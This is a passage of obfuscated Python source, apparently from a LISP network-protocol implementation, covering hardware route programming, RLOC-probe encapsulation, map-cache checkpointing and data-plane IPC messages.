iiIIII1I1ii = None
IIIIIi = II1ii1i
II1ii1i = II1ii1i . split ( "." )
for IiIIi1IiiIiI in range ( 1 , 255 ) :
II1ii1i [ 3 ] = str ( IiIIi1IiiIiI )
IiiIIi1 = "." . join ( II1ii1i )
if ( IiiIIi1 in OOoOoOO0 ) : continue
if ( IiiIIi1 == IIIIIi ) : continue
iiIIII1I1ii = IiiIIi1
break
if 29 - 29: I1ii11iIi11i
if ( iiIIII1I1ii == None ) :
lprint ( "Address allocation failed for vlan4094, cannot program " + "hardware" )
if 12 - 12: I11i . o0oOOo0O0Ooo . iIii1I11I1II1
return
if 93 - 93: ooOoO0o - OoooooooOO + iIii1I11I1II1 / o0oOOo0O0Ooo + iIii1I11I1II1
if 9 - 9: OoOoOO00 + ooOoO0o
if 61 - 61: i11iIiiIii + OOooOOo - i1IIi
if 2 - 2: I1ii11iIi11i / I1Ii111 / I1ii11iIi11i / iII111i * i11iIiiIii % iII111i
if 48 - 48: O0 + o0oOOo0O0Ooo . oO0o - IiII * OoooooooOO . OoO0O00
if 63 - 63: oO0o * OoO0O00 * oO0o
if 31 - 31: Oo0Ooo
O0OoO = oOo00O . split ( "." )
ooo0OooOo = lisp_hex_string ( O0OoO [ 1 ] ) . zfill ( 2 )
Oo00o = lisp_hex_string ( O0OoO [ 2 ] ) . zfill ( 2 )
i1IIIIii1I = lisp_hex_string ( O0OoO [ 3 ] ) . zfill ( 2 )
Ii = "00:00:00:{}:{}:{}" . format ( ooo0OooOo , Oo00o , i1IIIIii1I )
iI1111 = "0000.00{}.{}{}" . format ( ooo0OooOo , Oo00o , i1IIIIii1I )
iIII11I = "arp -i vlan4094 -s {} {}" . format ( iiIIII1I1ii , Ii )
os . system ( iIII11I )
if 6 - 6: Ii1I / Ii1I
if 9 - 9: iII111i + I1Ii111 + iII111i % ooOoO0o + i11iIiiIii + i11iIiiIii
if 45 - 45: i1IIi + I1ii11iIi11i
if 49 - 49: i11iIiiIii . I1ii11iIi11i
O0O000Ooo = ( "mac address-table static {} vlan 4094 " + "interface vxlan 1 vtep {}" ) . format ( iI1111 , oOo00O )
if 26 - 26: Oo0Ooo / I11i * i1IIi
lisp_send_to_arista ( O0O000Ooo , None )
if 7 - 7: I1ii11iIi11i . i11iIiiIii - oO0o + Ii1I
if 52 - 52: iIii1I11I1II1 - O0 - i1IIi + o0oOOo0O0Ooo * OOooOOo . O0
if 76 - 76: Ii1I / oO0o . I1Ii111
if 94 - 94: o0oOOo0O0Ooo - OoOoOO00 / I1Ii111
if 99 - 99: O0 % oO0o % OOooOOo - Oo0Ooo
II1iIi1ii1IIi = "ip route add {} via {}" . format ( iIi1iIi1 , iiIIII1I1ii )
os . system ( II1iIi1ii1IIi )
if 82 - 82: iII111i + OoooooooOO % iIii1I11I1II1 - o0oOOo0O0Ooo - i1IIi / Oo0Ooo
lprint ( "Hardware programmed with commands:" )
II1iIi1ii1IIi = II1iIi1ii1IIi . replace ( iIi1iIi1 , green ( iIi1iIi1 , False ) )
lprint ( " " + II1iIi1ii1IIi )
lprint ( " " + iIII11I )
O0O000Ooo = O0O000Ooo . replace ( oOo00O , red ( oOo00O , False ) )
lprint ( " " + O0O000Ooo )
return
if 13 - 13: iII111i % oO0o - I11i . i11iIiiIii / iIii1I11I1II1
if 11 - 11: iII111i % OoO0O00 % iIii1I11I1II1 + IiII * Ii1I
if 93 - 93: OOooOOo / iII111i
if 74 - 74: I1ii11iIi11i
if 83 - 83: iII111i + i1IIi - OoooooooOO
if 16 - 16: i1IIi
if 86 - 86: OoOoOO00 - iII111i - Oo0Ooo
def lisp_clear_hardware_walk ( mc , parms ) :
O000O0o00o0o = mc . eid . print_prefix_no_iid ( )
os . system ( "ip route delete {}" . format ( O000O0o00o0o ) )
return ( [ True , None ] )
if 33 - 33: Ii1I - OoO0O00
if 15 - 15: O0 . iIii1I11I1II1 - I1Ii111 + O0 + ooOoO0o / I1IiiI
if 8 - 8: iII111i % O0 - OoOoOO00
if 49 - 49: oO0o - OOooOOo / Ii1I / I1Ii111 . o0oOOo0O0Ooo . iII111i
if 58 - 58: IiII + Ii1I
if 89 - 89: Ii1I / Oo0Ooo * o0oOOo0O0Ooo / OoO0O00 + I11i
if 4 - 4: I11i
if 59 - 59: OoOoOO00 * I1ii11iIi11i / I1IiiI * II111iiii + OoOoOO00
def lisp_clear_map_cache ( ) :
global lisp_map_cache , lisp_rloc_probe_list
global lisp_crypto_keys_by_rloc_encap , lisp_crypto_keys_by_rloc_decap
global lisp_rtr_list , lisp_gleaned_groups
if 6 - 6: OoOoOO00 % oO0o + I11i * Ii1I
IIII = bold ( "User cleared" , False )
OO = lisp_map_cache . cache_count
lprint ( "{} map-cache with {} entries" . format ( IIII , OO ) )
if 92 - 92: OoOoOO00 + IiII . OoO0O00 % iII111i / II111iiii / I11i
if ( lisp_program_hardware ) :
lisp_map_cache . walk_cache ( lisp_clear_hardware_walk , None )
if 62 - 62: I1ii11iIi11i
lisp_map_cache = lisp_cache ( )
if 100 - 100: iII111i / ooOoO0o / IiII % II111iiii
if 6 - 6: OoooooooOO - I1IiiI + OoooooooOO
if 89 - 89: oO0o % Oo0Ooo . O0 . ooOoO0o
if 46 - 46: IiII * I11i - OoO0O00 - Ii1I
if 93 - 93: iIii1I11I1II1 / o0oOOo0O0Ooo - I11i - OOooOOo % ooOoO0o
lisp_rloc_probe_list = { }
if 16 - 16: ooOoO0o * o0oOOo0O0Ooo - IiII + I1ii11iIi11i / o0oOOo0O0Ooo - O0
if 71 - 71: i1IIi
if 79 - 79: iII111i * O0 / Ii1I / O0 % i1IIi
if 52 - 52: OoooooooOO % oO0o - I11i % OoOoOO00 . II111iiii
lisp_crypto_keys_by_rloc_encap = { }
lisp_crypto_keys_by_rloc_decap = { }
if 62 - 62: Ii1I . I1ii11iIi11i . iII111i + I11i * o0oOOo0O0Ooo
if 56 - 56: oO0o * iIii1I11I1II1 . II111iiii - II111iiii + II111iiii - i11iIiiIii
if 79 - 79: iII111i
if 29 - 29: Ii1I * I1Ii111 / OoO0O00 - O0 - i11iIiiIii * I1IiiI
if 2 - 2: OoOoOO00 . I1ii11iIi11i * I1ii11iIi11i
lisp_rtr_list = { }
if 42 - 42: OoO0O00 . OoO0O00 + II111iiii - IiII - OOooOOo * Oo0Ooo
if 47 - 47: oO0o - OoooooooOO + iII111i
if 69 - 69: I1ii11iIi11i - I1IiiI % oO0o + OOooOOo - I1Ii111
if 5 - 5: ooOoO0o . OoO0O00
lisp_gleaned_groups = { }
if 40 - 40: iII111i
if 87 - 87: IiII / II111iiii
if 44 - 44: OoO0O00 . I1Ii111 - OoooooooOO * OoOoOO00 . OoO0O00
if 84 - 84: OOooOOo . OOooOOo . oO0o % iII111i * Oo0Ooo - iIii1I11I1II1
lisp_process_data_plane_restart ( True )
return
if 4 - 4: iII111i
if 23 - 23: i1IIi . iIii1I11I1II1 / I1IiiI . OoOoOO00 . iII111i / IiII
if 65 - 65: Ii1I + IiII + I11i / I1Ii111 % iIii1I11I1II1
if 17 - 17: I1ii11iIi11i * OOooOOo % II111iiii
if 30 - 30: I1Ii111 . Ii1I . Oo0Ooo / OOooOOo * OoooooooOO / I1ii11iIi11i
if 41 - 41: i1IIi
if 75 - 75: o0oOOo0O0Ooo . I1Ii111 - I1Ii111 % Ii1I * OoooooooOO
if 99 - 99: OOooOOo + o0oOOo0O0Ooo - OOooOOo . i1IIi
if 86 - 86: Ii1I % oO0o - i11iIiiIii - O0 + IiII + iII111i
if 100 - 100: OoO0O00 . Oo0Ooo
if 29 - 29: OoO0O00
def lisp_encapsulate_rloc_probe ( lisp_sockets , rloc , nat_info , packet ) :
if ( len ( lisp_sockets ) != 4 ) : return
if 34 - 34: O0 - o0oOOo0O0Ooo % OOooOOo . OoO0O00 % IiII
OooooO0o00 = lisp_myrlocs [ 0 ]
if 24 - 24: IiII / I1ii11iIi11i / OOooOOo
if 23 - 23: o0oOOo0O0Ooo - OoooooooOO % I1ii11iIi11i * i1IIi
if 67 - 67: I1ii11iIi11i % OoOoOO00 . iII111i / Ii1I . I1IiiI
if 48 - 48: IiII + II111iiii . I1IiiI % o0oOOo0O0Ooo
if 57 - 57: OOooOOo . I11i % OoOoOO00
iiiIIiiIi = len ( packet ) + 28
Ooo0oO = struct . pack ( "BBHIBBHII" , 0x45 , 0 , socket . htons ( iiiIIiiIi ) , 0 , 64 ,
17 , 0 , socket . htonl ( OooooO0o00 . address ) , socket . htonl ( rloc . address ) )
Ooo0oO = lisp_ip_checksum ( Ooo0oO )
if 68 - 68: iIii1I11I1II1 % I1ii11iIi11i % II111iiii / O0 + iII111i
o0oOo00 = struct . pack ( "HHHH" , 0 , socket . htons ( LISP_CTRL_PORT ) ,
socket . htons ( iiiIIiiIi - 20 ) , 0 )
if 78 - 78: iII111i - OOooOOo / I1Ii111
if 38 - 38: I11i % i1IIi + o0oOOo0O0Ooo + I1ii11iIi11i + I1IiiI
if 1 - 1: II111iiii * o0oOOo0O0Ooo . O0 - Ii1I / oO0o
if 17 - 17: OoooooooOO % OoooooooOO + Oo0Ooo + I1Ii111
packet = lisp_packet ( Ooo0oO + o0oOo00 + packet )
if 56 - 56: I11i % OoOoOO00 - OoO0O00
if 31 - 31: iII111i % i11iIiiIii - Ii1I / OOooOOo - I1Ii111
if 60 - 60: o0oOOo0O0Ooo + Oo0Ooo . O0
if 51 - 51: i11iIiiIii / iIii1I11I1II1 . I1IiiI - Ii1I * I1Ii111 . iII111i
packet . inner_dest . copy_address ( rloc )
packet . inner_dest . instance_id = 0xffffff
packet . inner_source . copy_address ( OooooO0o00 )
packet . inner_ttl = 64
packet . outer_dest . copy_address ( rloc )
packet . outer_source . copy_address ( OooooO0o00 )
packet . outer_version = packet . outer_dest . afi_to_version ( )
packet . outer_ttl = 64
packet . encap_port = nat_info . port if nat_info else LISP_DATA_PORT
if 72 - 72: Ii1I . I11i / i1IIi % i1IIi + I1ii11iIi11i
o0O00oo0O = red ( rloc . print_address_no_iid ( ) , False )
if ( nat_info ) :
OOo0OOO0 = " {}" . format ( blue ( nat_info . hostname , False ) )
OOO0oOooOOo00 = bold ( "RLOC-probe request" , False )
else :
OOo0OOO0 = ""
OOO0oOooOOo00 = bold ( "RLOC-probe reply" , False )
if 56 - 56: OoO0O00 - OoOoOO00 - II111iiii * o0oOOo0O0Ooo
if 87 - 87: ooOoO0o * OoooooooOO % O0 * OoooooooOO . I1Ii111
lprint ( ( "Data encapsulate {} to {}{} port {} for " + "NAT-traversal" ) . format ( OOO0oOooOOo00 , o0O00oo0O , OOo0OOO0 , packet . encap_port ) )
if 66 - 66: OoO0O00 * Ii1I . OoO0O00
if 90 - 90: II111iiii % Ii1I
if 67 - 67: I1IiiI - I11i - i11iIiiIii
if 45 - 45: ooOoO0o - IiII / OoO0O00 / IiII
if 63 - 63: ooOoO0o . i11iIiiIii + iII111i . OoO0O00 / ooOoO0o % iII111i
if ( packet . encode ( None ) == None ) : return
packet . print_packet ( "Send" , True )
if 23 - 23: iIii1I11I1II1 - ooOoO0o / I11i * I11i
O00OOOoo = lisp_sockets [ 3 ]
packet . send_packet ( O00OOOoo , packet . outer_dest )
del ( packet )
return
if 95 - 95: i1IIi . I11i - OoO0O00 * Ii1I + OOooOOo + iII111i
if 96 - 96: I1IiiI
if 62 - 62: I1Ii111
if 96 - 96: ooOoO0o % I11i + o0oOOo0O0Ooo / I1Ii111 * I1Ii111 . OoO0O00
if 84 - 84: i1IIi - I1Ii111 - IiII * i1IIi
if 36 - 36: o0oOOo0O0Ooo % I11i % iII111i % O0
if 3 - 3: I1ii11iIi11i / O0 * II111iiii . O0
if 86 - 86: iIii1I11I1II1
def lisp_get_default_route_next_hops ( ) :
if 39 - 39: I11i
if 77 - 77: OoO0O00 / OoO0O00 . ooOoO0o . Oo0Ooo * OoooooooOO * I11i
if 63 - 63: iIii1I11I1II1 + ooOoO0o + o0oOOo0O0Ooo . ooOoO0o / o0oOOo0O0Ooo - IiII
if 7 - 7: I1ii11iIi11i . iII111i . OOooOOo
if ( lisp_is_macos ( ) ) :
ooO0ooooO = "route -n get default"
OOoOOOOOo0o = commands . getoutput ( ooO0ooooO ) . split ( "\n" )
O0O0oOo = II1i = None
for ii11I1IIi in OOoOOOOOo0o :
if ( ii11I1IIi . find ( "gateway: " ) != - 1 ) : O0O0oOo = ii11I1IIi . split ( ": " ) [ 1 ]
if ( ii11I1IIi . find ( "interface: " ) != - 1 ) : II1i = ii11I1IIi . split ( ": " ) [ 1 ]
if 97 - 97: Ii1I / ooOoO0o . Ii1I * I1Ii111 + I1ii11iIi11i % IiII
return ( [ [ II1i , O0O0oOo ] ] )
if 42 - 42: iII111i % OoOoOO00 . OoooooooOO
if 81 - 81: iII111i
if 2 - 2: i1IIi
if 60 - 60: OOooOOo + I1ii11iIi11i / OoOoOO00 * i1IIi / O0
if 24 - 24: Oo0Ooo . IiII % o0oOOo0O0Ooo . OOooOOo . I1IiiI + I1Ii111
ooO0ooooO = "ip route | egrep 'default via'"
ooooO0OO0 = commands . getoutput ( ooO0ooooO ) . split ( "\n" )
if 51 - 51: Oo0Ooo * I11i % i1IIi / iIii1I11I1II1 . OoooooooOO
oOOoO = [ ]
for Ooo00000oO in ooooO0OO0 :
if ( Ooo00000oO . find ( " metric " ) != - 1 ) : continue
i11iII1IiI = Ooo00000oO . split ( " " )
try :
IiIIIiiIiiI = i11iII1IiI . index ( "via" ) + 1
if ( IiIIIiiIiiI >= len ( i11iII1IiI ) ) : continue
oOoO0oO0O00o00O = i11iII1IiI . index ( "dev" ) + 1
if ( oOoO0oO0O00o00O >= len ( i11iII1IiI ) ) : continue
except :
continue
if 68 - 68: ooOoO0o + OoOoOO00 + iIii1I11I1II1
if 21 - 21: iII111i + II111iiii - I1ii11iIi11i / OOooOOo + iII111i
oOOoO . append ( [ i11iII1IiI [ oOoO0oO0O00o00O ] , i11iII1IiI [ IiIIIiiIiiI ] ] )
if 60 - 60: iII111i . OoO0O00 / oO0o - OoO0O00 + ooOoO0o * I1Ii111
return ( oOOoO )
if 8 - 8: oO0o - O0 % I1IiiI . I1ii11iIi11i / I11i / I1Ii111
if 18 - 18: Oo0Ooo % I1ii11iIi11i
if 90 - 90: iII111i . O0
if 6 - 6: I1IiiI + o0oOOo0O0Ooo . OoooooooOO * oO0o + OoooooooOO
if 77 - 77: II111iiii / I1Ii111 * i11iIiiIii + OoooooooOO
if 4 - 4: iIii1I11I1II1 - Oo0Ooo / OOooOOo % OoooooooOO . Oo0Ooo - Oo0Ooo
if 41 - 41: II111iiii . o0oOOo0O0Ooo
def lisp_get_host_route_next_hop ( rloc ) :
ooO0ooooO = "ip route | egrep '{} via'" . format ( rloc )
Ooo00000oO = commands . getoutput ( ooO0ooooO ) . split ( " " )
if 92 - 92: Ii1I - O0 - i11iIiiIii + IiII % I1Ii111 + II111iiii
try : ooo = Ooo00000oO . index ( "via" ) + 1
except : return ( None )
if 71 - 71: ooOoO0o * I1Ii111 + i11iIiiIii + i1IIi . I1IiiI
if ( ooo >= len ( Ooo00000oO ) ) : return ( None )
return ( Ooo00000oO [ ooo ] )
if 15 - 15: OoO0O00
if 37 - 37: OoO0O00 . OoooooooOO - OOooOOo
if 34 - 34: o0oOOo0O0Ooo + iIii1I11I1II1 / o0oOOo0O0Ooo / ooOoO0o
if 53 - 53: II111iiii / iIii1I11I1II1
if 25 - 25: I1Ii111
if 58 - 58: OoOoOO00 * i1IIi
if 20 - 20: IiII
def lisp_install_host_route ( dest , nh , install ) :
install = "add" if install else "delete"
ooooOOO0OoO = "none" if nh == None else nh
if 81 - 81: I1Ii111 . i1IIi / o0oOOo0O0Ooo
lprint ( "{} host-route {}, nh {}" . format ( install . title ( ) , dest , ooooOOO0OoO ) )
if 30 - 30: i11iIiiIii . I1IiiI
if ( nh == None ) :
iI1i1iIIIII = "ip route {} {}/32" . format ( install , dest )
else :
iI1i1iIIIII = "ip route {} {}/32 via {}" . format ( install , dest , nh )
if 5 - 5: Ii1I / O0 + iIii1I11I1II1
os . system ( iI1i1iIIIII )
return
if 22 - 22: ooOoO0o . ooOoO0o * OOooOOo % OoOoOO00
if 51 - 51: OoOoOO00 . oO0o - OoOoOO00
if 79 - 79: iII111i
if 71 - 71: i1IIi / OoO0O00 / OOooOOo + I1Ii111
if 80 - 80: Oo0Ooo . iIii1I11I1II1 . OoooooooOO % iII111i . oO0o
if 10 - 10: i11iIiiIii * OoooooooOO . i11iIiiIii
if 35 - 35: OOooOOo * OOooOOo + o0oOOo0O0Ooo / i1IIi - I11i
if 12 - 12: I1ii11iIi11i - i11iIiiIii + I1IiiI . Oo0Ooo
def lisp_checkpoint ( checkpoint_list ) :
if ( lisp_checkpoint_map_cache == False ) : return
if 26 - 26: oO0o + I1Ii111 + IiII * o0oOOo0O0Ooo . oO0o
ii11I1IIi = open ( lisp_checkpoint_filename , "w" )
for I1iII11ii1 in checkpoint_list :
ii11I1IIi . write ( I1iII11ii1 + "\n" )
if 95 - 95: OoOoOO00 . I1Ii111 / Ii1I . I1Ii111 % OoO0O00
ii11I1IIi . close ( )
lprint ( "{} {} entries to file '{}'" . format ( bold ( "Checkpoint" , False ) ,
len ( checkpoint_list ) , lisp_checkpoint_filename ) )
return
if 16 - 16: Ii1I / I1IiiI / I1IiiI - OoooooooOO
if 13 - 13: OOooOOo / OoooooooOO
if 7 - 7: II111iiii - ooOoO0o
if 72 - 72: Ii1I
if 27 - 27: ooOoO0o / IiII + OoO0O00 + Ii1I % I1Ii111
if 86 - 86: O0 % i11iIiiIii - Ii1I * oO0o % OOooOOo * i1IIi
if 87 - 87: II111iiii
if 53 - 53: OoOoOO00 * i11iIiiIii / I1Ii111
def lisp_load_checkpoint ( ) :
if ( lisp_checkpoint_map_cache == False ) : return
if ( os . path . exists ( lisp_checkpoint_filename ) == False ) : return
if 100 - 100: ooOoO0o + I1IiiI * oO0o + ooOoO0o
ii11I1IIi = open ( lisp_checkpoint_filename , "r" )
if 24 - 24: i11iIiiIii + ooOoO0o
OO = 0
for I1iII11ii1 in ii11I1IIi :
OO += 1
oOo = I1iII11ii1 . split ( " rloc " )
ooOOo = [ ] if ( oOo [ 1 ] in [ "native-forward\n" , "\n" ] ) else oOo [ 1 ] . split ( ", " )
if 80 - 80: IiII % I11i % oO0o
if 97 - 97: i1IIi * i11iIiiIii / Ii1I - I1IiiI % IiII
ooo0oo = [ ]
for oOo00O in ooOOo :
iIII = lisp_rloc ( False )
i11iII1IiI = oOo00O . split ( " " )
iIII . rloc . store_address ( i11iII1IiI [ 0 ] )
iIII . priority = int ( i11iII1IiI [ 1 ] )
iIII . weight = int ( i11iII1IiI [ 2 ] )
ooo0oo . append ( iIII )
if 70 - 70: iIii1I11I1II1
if 2 - 2: IiII - i1IIi * IiII % O0 / Ii1I
IiiiiII1i = lisp_mapping ( "" , "" , ooo0oo )
if ( IiiiiII1i != None ) :
IiiiiII1i . eid . store_prefix ( oOo [ 0 ] )
IiiiiII1i . checkpoint_entry = True
IiiiiII1i . map_cache_ttl = LISP_NMR_TTL * 60
if ( ooo0oo == [ ] ) : IiiiiII1i . action = LISP_NATIVE_FORWARD_ACTION
IiiiiII1i . add_cache ( )
continue
if 64 - 64: iII111i - Oo0Ooo
if 73 - 73: iIii1I11I1II1 * I1Ii111 * OoO0O00
OO -= 1
if 68 - 68: ooOoO0o * Ii1I / I1ii11iIi11i * OoooooooOO + OoooooooOO . OoooooooOO
if 50 - 50: I1IiiI % o0oOOo0O0Ooo
ii11I1IIi . close ( )
lprint ( "{} {} map-cache entries from file '{}'" . format (
bold ( "Loaded" , False ) , OO , lisp_checkpoint_filename ) )
return
if 1 - 1: II111iiii
if 22 - 22: I1Ii111 + iII111i
if 50 - 50: iII111i % OoOoOO00 - II111iiii + II111iiii / OoO0O00
if 69 - 69: Ii1I * II111iiii
if 24 - 24: I1Ii111 * I1ii11iIi11i . OOooOOo . I1IiiI - I1ii11iIi11i
if 56 - 56: I1IiiI * Oo0Ooo + OoO0O00 - oO0o * I1Ii111
if 68 - 68: ooOoO0o * i11iIiiIii * OOooOOo % iII111i
if 10 - 10: Ii1I / Oo0Ooo - i1IIi
if 11 - 11: I11i * iII111i
if 28 - 28: II111iiii + IiII / Oo0Ooo * I1IiiI - OOooOOo
if 2 - 2: oO0o + I11i / I1Ii111 . I11i
if 59 - 59: Ii1I
if 47 - 47: iII111i % iII111i
if 81 - 81: oO0o / I1ii11iIi11i . OoooooooOO % II111iiii / oO0o
def lisp_write_checkpoint_entry ( checkpoint_list , mc ) :
if ( lisp_checkpoint_map_cache == False ) : return
if 23 - 23: IiII + oO0o + o0oOOo0O0Ooo . I1ii11iIi11i / i11iIiiIii + iIii1I11I1II1
I1iII11ii1 = "{} rloc " . format ( mc . eid . print_prefix ( ) )
if 74 - 74: I11i % OOooOOo
for iIII in mc . rloc_set :
if ( iIII . rloc . is_null ( ) ) : continue
I1iII11ii1 += "{} {} {}, " . format ( iIII . rloc . print_address_no_iid ( ) ,
iIII . priority , iIII . weight )
if 57 - 57: O0 + I1IiiI + i11iIiiIii
if 90 - 90: I1ii11iIi11i . OoO0O00 * iIii1I11I1II1 - Oo0Ooo
if ( mc . rloc_set != [ ] ) :
I1iII11ii1 = I1iII11ii1 [ 0 : - 2 ]
elif ( mc . action == LISP_NATIVE_FORWARD_ACTION ) :
I1iII11ii1 += "native-forward"
if 28 - 28: I1IiiI . ooOoO0o - ooOoO0o * OOooOOo . IiII
if 16 - 16: iIii1I11I1II1 % i11iIiiIii / Ii1I % iIii1I11I1II1 / iII111i
checkpoint_list . append ( I1iII11ii1 )
return
if 27 - 27: II111iiii * OoooooooOO / Oo0Ooo % O0
if 41 - 41: oO0o / iIii1I11I1II1 % iII111i - I1Ii111 % I11i * i11iIiiIii
if 21 - 21: O0
if 14 - 14: IiII / I1ii11iIi11i + Ii1I
if 48 - 48: I1Ii111 * oO0o / o0oOOo0O0Ooo * OoOoOO00 * ooOoO0o
if 38 - 38: I1IiiI * Ii1I + Oo0Ooo - OoooooooOO
if 63 - 63: I1ii11iIi11i
def lisp_check_dp_socket ( ) :
O0OOoo0o00O = lisp_ipc_dp_socket_name
if ( os . path . exists ( O0OOoo0o00O ) == False ) :
IiII1iII1 = bold ( "does not exist" , False )
lprint ( "Socket '{}' {}" . format ( O0OOoo0o00O , IiII1iII1 ) )
return ( False )
if 1 - 1: Oo0Ooo * iIii1I11I1II1
return ( True )
if 28 - 28: iIii1I11I1II1
if 49 - 49: II111iiii * Oo0Ooo
if 74 - 74: OOooOOo % I1ii11iIi11i
if 83 - 83: OoO0O00 + O0
if 95 - 95: i1IIi % I11i
if 75 - 75: I11i * Oo0Ooo
if 73 - 73: O0
def lisp_write_to_dp_socket ( entry ) :
try :
OOOiii = json . dumps ( entry )
O00oOoOoO0ooO = bold ( "Write IPC" , False )
lprint ( "{} record to named socket: '{}'" . format ( O00oOoOoO0ooO , OOOiii ) )
lisp_ipc_dp_socket . sendto ( OOOiii , lisp_ipc_dp_socket_name )
except :
lprint ( "Failed to write IPC record to named socket: '{}'" . format ( OOOiii ) )
if 33 - 33: O0
return
if 14 - 14: i11iIiiIii . I1Ii111 % I1ii11iIi11i . I1ii11iIi11i % IiII
if 93 - 93: iIii1I11I1II1 / IiII
if 91 - 91: i11iIiiIii % ooOoO0o - iII111i * I1Ii111 . i11iIiiIii
if 1 - 1: IiII + iIii1I11I1II1 * I1ii11iIi11i - IiII - i1IIi
if 75 - 75: II111iiii * o0oOOo0O0Ooo / I1ii11iIi11i
if 46 - 46: OOooOOo
if 67 - 67: OoO0O00 . I11i % OOooOOo + Oo0Ooo
if 40 - 40: OoO0O00 / I11i % iIii1I11I1II1 - ooOoO0o
if 51 - 51: Oo0Ooo % iIii1I11I1II1 % oO0o + o0oOOo0O0Ooo
def lisp_write_ipc_keys ( rloc ) :
oo0o00OO = rloc . rloc . print_address_no_iid ( )
IiI1iI1 = rloc . translated_port
if ( IiI1iI1 != 0 ) : oo0o00OO += ":" + str ( IiI1iI1 )
if ( lisp_rloc_probe_list . has_key ( oo0o00OO ) == False ) : return
if 32 - 32: I1Ii111 * I1IiiI + Ii1I
for i11iII1IiI , oOo , i11ii in lisp_rloc_probe_list [ oo0o00OO ] :
IiiiiII1i = lisp_map_cache . lookup_cache ( oOo , True )
if ( IiiiiII1i == None ) : continue
lisp_write_ipc_map_cache ( True , IiiiiII1i )
if 30 - 30: OoooooooOO / I1IiiI . iIii1I11I1II1 / ooOoO0o
return
if 20 - 20: OoooooooOO * OOooOOo
if 77 - 77: Ii1I - OoooooooOO . OoOoOO00
if 93 - 93: OoooooooOO / I1Ii111
if 91 - 91: I1Ii111
if 18 - 18: ooOoO0o * I11i
if 53 - 53: I11i . i11iIiiIii - iIii1I11I1II1 / I1Ii111
if 86 - 86: i1IIi % OoO0O00 - OoooooooOO
def lisp_write_ipc_map_cache ( add_or_delete , mc , dont_send = False ) :
if ( lisp_i_am_etr ) : return
if ( lisp_ipc_dp_socket == None ) : return
if ( lisp_check_dp_socket ( ) == False ) : return
if 63 - 63: o0oOOo0O0Ooo . iIii1I11I1II1 % IiII * i11iIiiIii
if 70 - 70: iIii1I11I1II1
if 12 - 12: OoOoOO00 / o0oOOo0O0Ooo - I1ii11iIi11i + oO0o + O0
if 9 - 9: I1ii11iIi11i * OoooooooOO . O0 . ooOoO0o * i11iIiiIii / i1IIi
IiI1III = "add" if add_or_delete else "delete"
I1iII11ii1 = { "type" : "map-cache" , "opcode" : IiI1III }
if 38 - 38: OoOoOO00 . OoooooooOO % I1ii11iIi11i . oO0o % oO0o
iIIiI = ( mc . group . is_null ( ) == False )
if ( iIIiI ) :
I1iII11ii1 [ "eid-prefix" ] = mc . group . print_prefix_no_iid ( )
I1iII11ii1 [ "rles" ] = [ ]
else :
I1iII11ii1 [ "eid-prefix" ] = mc . eid . print_prefix_no_iid ( )
I1iII11ii1 [ "rlocs" ] = [ ]
if 80 - 80: i11iIiiIii / OoOoOO00 . OOooOOo . iIii1I11I1II1
I1iII11ii1 [ "instance-id" ] = str ( mc . eid . instance_id )
if 81 - 81: I1ii11iIi11i * OoO0O00 . o0oOOo0O0Ooo . OoooooooOO
if ( iIIiI ) :
if ( len ( mc . rloc_set ) >= 1 and mc . rloc_set [ 0 ] . rle ) :
for iIIII1iiIII in mc . rloc_set [ 0 ] . rle . rle_forwarding_list :
IiiIIi1 = iIIII1iiIII . address . print_address_no_iid ( )
IiI1iI1 = str ( 4341 ) if iIIII1iiIII . translated_port == 0 else str ( iIIII1iiIII . translated_port )
if 64 - 64: Oo0Ooo . I1ii11iIi11i / ooOoO0o % oO0o . iIii1I11I1II1
i11iII1IiI = { "rle" : IiiIIi1 , "port" : IiI1iI1 }
IiiI , Oo0oO = iIIII1iiIII . get_encap_keys ( )
i11iII1IiI = lisp_build_json_keys ( i11iII1IiI , IiiI , Oo0oO , "encrypt-key" )
I1iII11ii1 [ "rles" ] . append ( i11iII1IiI )
if 82 - 82: IiII * iIii1I11I1II1
if 60 - 60: I1IiiI - I1IiiI + I1ii11iIi11i
else :
for oOo00O in mc . rloc_set :
if ( oOo00O . rloc . is_ipv4 ( ) == False and oOo00O . rloc . is_ipv6 ( ) == False ) :
continue
if 8 - 8: I1Ii111 - I1Ii111 - i1IIi + I11i . i1IIi / I1Ii111
if ( oOo00O . up_state ( ) == False ) : continue
if 27 - 27: OoOoOO00 % ooOoO0o - II111iiii . I11i
IiI1iI1 = str ( 4341 ) if oOo00O . translated_port == 0 else str ( oOo00O . translated_port )
if 70 - 70: OOooOOo / iII111i - I11i + OoOoOO00 % Ii1I * IiII
i11iII1IiI = { "rloc" : oOo00O . rloc . print_address_no_iid ( ) , "priority" :
str ( oOo00O . priority ) , "weight" : str ( oOo00O . weight ) , "port" :
IiI1iI1 }
IiiI , Oo0oO = oOo00O . get_encap_keys ( )
i11iII1IiI = lisp_build_json_keys ( i11iII1IiI , IiiI , Oo0oO , "encrypt-key" )
I1iII11ii1 [ "rlocs" ] . append ( i11iII1IiI )
if 26 - 26: O0 / oO0o
if 96 - 96: ooOoO0o * iII111i . IiII
if 77 - 77: OOooOOo - I11i % o0oOOo0O0Ooo
if ( dont_send == False ) : lisp_write_to_dp_socket ( I1iII11ii1 )
return ( I1iII11ii1 )
if 46 - 46: I1IiiI % oO0o . OoooooooOO . IiII / I11i - i1IIi
if 43 - 43: OoOoOO00 - o0oOOo0O0Ooo
if 22 - 22: i1IIi
if 33 - 33: O0
if 34 - 34: I1Ii111 . IiII % iII111i
if 94 - 94: OOooOOo % i11iIiiIii . OOooOOo
if 55 - 55: OoOoOO00 . OoOoOO00 % o0oOOo0O0Ooo . I11i . I1ii11iIi11i - o0oOOo0O0Ooo
def lisp_write_ipc_decap_key ( rloc_addr , keys ) :
if ( lisp_i_am_itr ) : return
if ( lisp_ipc_dp_socket == None ) : return
if ( lisp_check_dp_socket ( ) == False ) : return
if 1 - 1: i11iIiiIii - i1IIi * oO0o - iIii1I11I1II1
if 75 - 75: i1IIi * i11iIiiIii
if 40 - 40: I1ii11iIi11i + OoO0O00
if 8 - 8: i11iIiiIii - iIii1I11I1II1
if ( keys == None or len ( keys ) == 0 or keys [ 1 ] == None ) : return
if 73 - 73: OoOoOO00
IiiI = keys [ 1 ] . encrypt_key
Oo0oO = keys [ 1 ] . icv_key
if 25 - 25: iII111i / oO0o
if 61 - 61: OoooooooOO . Ii1I . I11i + oO0o
if 73 - 73: II111iiii % i11iIiiIii * I1ii11iIi11i + O0
if 61 - 61: I1IiiI / OOooOOo
oo0000O = rloc_addr . split ( ":" )
if ( len ( oo0000O ) == 1 ) :
I1iII11ii1 = { "type" : "decap-keys" , "rloc" : oo0000O [ 0 ] }
